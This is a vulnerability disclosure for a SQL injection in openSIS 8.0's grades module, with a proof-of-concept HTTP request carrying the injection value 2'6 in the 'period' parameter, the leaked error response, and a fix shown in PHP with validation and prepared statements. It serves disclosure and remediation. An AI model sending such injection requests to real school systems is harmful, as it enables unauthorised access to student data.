A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can inject SQL through the period parameter of /opensis/modules/grades/InputFinalGrades.php.
POC:
REQUEST:
GET /Modules.php?modname=users/TeacherPrograms.php?include=grades/InputFinalGrades.php&include_inactive=&modfunc=gradebook&mp=21&use_percents=true&period=2'6 HTTP/1.1
Host: 192.168.21.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.21.130/Modules.php?modname=miscellaneous/Portal.php&failed_login=
Cookie: PHPSESSID=1kkijlk6rkvfn3rs91kjn5hj1i; miniSidebar=0
Upgrade-Insecure-Requests: 1
RESPONSE:
HTTP/1.1 200 OK
Date: Wed, 22 Sep 2021 05:39:16 GMT
Server: Apache/2.4.46 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 60208
Connection: close
Content-Type: text/html; charset=UTF-8
[…]
SQL:
SELECT cp.BEGIN_DATE,cp.MARKING_PERIOD_ID FROM course_periods cp,course_period_var cpv WHERE cpv.COURSE_PERIOD_ID=cp.COURSE_PERIOD_ID AND cpv.ID=2'6
Traceback:
/var/www/opensis/modules/grades/InputFinalGrades.php at 55
Additional Information:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''6' at line 1
[…]
SOLUTION:
Use the sqlSecurityFilter() function on $_REQUEST['period'] before it is placed into the "SELECT" query.
$period = sqlSecurityFilter($_REQUEST['period']);
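The following is an added example, not code from openSIS or from the reporter, showing the two halves of the fix the report points at: the query from the traceback built by raw concatenation (which is how a value such as 2'6 ends up breaking the SQL syntax) next to a hardened path that validates period as an integer and binds it as a prepared-statement parameter. It does not use sqlSecurityFilter(), whose behaviour the report does not describe; the function names, the JOIN rewrite of the query and the sample inputs are assumptions and constructed values.

```php
<?php
// Added example (not openSIS code): handling the `period` request
// parameter before it reaches the course_periods query from the report.

// Vulnerable pattern as described in the report: the raw request value
// is concatenated into the SQL text, so 2'6 yields the syntax error seen
// in the traceback. Kept here only to show the shape of the problem.
function build_query_unsafe(string $period): string
{
    return "SELECT cp.BEGIN_DATE,cp.MARKING_PERIOD_ID FROM course_periods cp,course_period_var cpv "
         . "WHERE cpv.COURSE_PERIOD_ID=cp.COURSE_PERIOD_ID AND cpv.ID=" . $period;
}

// Hardened step 1: cpv.ID is an integer key, so the value must validate
// as a positive integer before it is used at all. Returns null on failure.
function validate_period(mixed $raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Hardened step 2: even a validated value goes through a bound parameter,
// so the SQL text never depends on request data. (JOIN form is assumed;
// it is equivalent to the comma-join in the report.)
function fetch_marking_period(mysqli $db, int $periodId): ?array
{
    $stmt = $db->prepare(
        'SELECT cp.BEGIN_DATE, cp.MARKING_PERIOD_ID FROM course_periods cp '
      . 'JOIN course_period_var cpv ON cpv.COURSE_PERIOD_ID = cp.COURSE_PERIOD_ID '
      . 'WHERE cpv.ID = ?'
    );
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $stmt->bind_param('i', $periodId);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Constructed inputs: the payload from the report and a legitimate value.
foreach (["2'6", '21'] as $raw) {
    echo "unsafe query text would be: " . build_query_unsafe($raw) . PHP_EOL;
    $id = validate_period($raw);
    if ($id === null) {
        // In a real handler respond 400 and stop; the parameter is not an id.
        echo "rejected period parameter: " . var_export($raw, true) . PHP_EOL;
        continue;
    }
    echo "accepted period id {$id}; the query would use a bound placeholder" . PHP_EOL;
    // $row = fetch_marking_period($db, $id);  // needs a live mysqli connection
}
```

Running the script without a database still shows the contrast: the first input is rejected by validate_period() before any SQL is built, while the second passes and would be bound as an integer. Validation and parameter binding are deliberately separate so that a non-numeric period produces a clean 400 rather than a database error message reaching the client, which is what the "Additional Information" text in the report shows happening today.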